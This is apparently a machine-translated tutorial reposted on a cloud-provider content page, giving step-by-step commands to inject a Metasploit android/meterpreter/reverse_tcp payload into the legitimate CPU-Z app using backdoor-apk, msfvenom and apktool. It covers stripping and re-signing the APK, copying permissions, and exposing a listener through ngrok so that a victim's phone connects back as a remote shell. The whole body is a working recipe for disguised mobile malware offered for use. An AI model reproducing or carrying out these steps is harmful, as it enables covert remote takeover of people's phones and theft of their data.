MSF Extranet--->> android

Source: Internet
Author: User
Tags kali linux

1. Tool Preparation

Kali Linux

Backdoor

Ngrok Server One

Apktool

Test App:cpu-z

2. Processing environment

  Apktool update: https://ibotpeaches.github.io/Apktool/after download renamed to Apktool.jar cover off the original/usr/share/apktool/apktool.jar

Backdoor Download: command git clone https://github.com/dana-at-cp/backdoor-apk.git

Go to https://www.ngrok.cc, download Linux 64-bit port forwarding tool, move to desktop backup

Terminal enters desktop run:./sunny ClientID Tunnel ID

Go to Backdoor directory: cd/backdoor-apk/backdoor-apk

Download cpu-z, rename to 1.apk, drag 1.apk to/backdoor-apk/apkdoor-apk

Run Backdoor: Enter./backdoor-apk.sh 1.apk, as entered in this image, swap IP for ngrok domain name, port set to Ngrok port

Find payload injected APK file/backdoor-apk/backdoor-apk/original/dist

Renamed 2.zip moved to the root directory, with the compression software opened. Delete the Meta-inf file and exit. Then change the 2.zip to 2.apk

Apktool to decompile: Apktool d/root/2.apk generates a 2 file

Change permissions: Open Androidmanifest.xml, with msfvenom-p android/meterpreter/reverse_tcp lhost=10.161.94.25 lport=4444-o obj.apk command to generate a Trojan backdoor obj.apk, decompile, open androidmanifest.xml Copy the code shown to the/root/2/androidmanifest.xml file under the same location (note cannot be duplicated)

RePack: Command: Apktool B/ROOT/2 will generate a 2.apk under/root/2/dist renaming to 3.apk and moving to the root directory

To sign a packaged file:

Mr. Cheng signed Certificate: command: Keytool-genkey-alias android.keystore-keyalg rsa-validity 20000-keystore android.keystore

Parameter description:

-genkey Generating Files

-alias aliases

-keylog Encryption algorithm

-validity Validity

-keystore file name

Signature: Command: Jarsigner-verbose-keystore android.keystore-signedjar 3_signed.apk 3.apk android.keystore

Parameter description:

-verbose if it appears on the command line, it represents "verbose" mode, which enables Jarsigner to output additional information during the JAR signature or validation process.

-keystore specifying the path to the key warehouse

-SIGNEDJAR Specifies the name used for the signed JAR file. Coverage

At this point the backdoor has been added, next, open the MSF console, set the monitoring parameters, wait for the line. Open terminal, Input command msfconsole, enter. Enter the MSF console.

Enter command use Exploit/multi/handler, enter.

Enter set PAYLOAD android/meterpreter/reverse_tcp, carriage return.

Input set Lhost Intranet IP, enter.

Enter the local port of the set Lport Ngrok map, enter.

Input exploit start monitoring

Install the APK file on your Android phone and wait for Android to go online.

Note: If you kali Linux's intranet IP, you can change it directly to your intranet IP in Ngrok and then set Lhost to your intranet IP and then run to listen.

    

MSF Extranet--->> android

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.